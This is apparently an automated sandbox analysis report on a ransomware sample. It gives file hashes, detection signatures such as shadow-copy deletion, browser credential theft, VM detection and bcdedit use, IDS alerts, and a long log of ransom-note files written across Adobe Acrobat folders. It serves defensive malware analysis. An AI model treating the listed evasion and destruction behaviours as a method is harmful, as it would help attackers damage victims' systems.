Windows Analysis Report
2b7cu0KwZl.exe

Overview

General Information

Sample name: 2b7cu0KwZl.exe (renamed because original name is a hash value)
Original sample name: e21cbdbf6414ffc0ef4175295c7e188800a66b7b83302bd35b7e3fd6fabfccde.exe
Analysis ID: 1548500
MD5: 0d7e80ec85db5cb45642235cb2381a0c
SHA1: f0a15a7ecaff7d0659bab2a416e5d668ff67724e
SHA256: e21cbdbf6414ffc0ef4175295c7e188800a66b7b83302bd35b7e3fd6fabfccde
Tags: 193-143-1-139, exe, user-JAMESWT_MHT

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Deletes shadow drive data (may be related to ransomware)
Found Tor onion address
Infects executable files (exe, dll, sys, html)
Modifies existing user documents (likely ransomware behavior)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Abnormal high CPU Usage
Enables debug privileges
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • 2b7cu0KwZl.exe (PID: 4476 cmdline: "C:\Users\user\Desktop\2b7cu0KwZl.exe" MD5: 0D7E80EC85DB5CB45642235CB2381A0C)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-04T15:21:29.172717+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.4 | 49737 | TCP
2024-11-04T15:22:08.641719+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.4 | 49772 | TCP

AV Detection

Source: 2b7cu0KwZl.exe | ReversingLabs: Detection: 47%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 99.4% probability
Source: 2b7cu0KwZl.exe, 00000000.00000000.1791805543.00007FF6882F3000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: -----BEGIN RSA PUBLIC KEY----- (memstr_459c71e0-4)
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\microsoftGraph\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\2.1.15\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\misc\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themeless_Reader\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\ccpdf\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\images\themeless\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
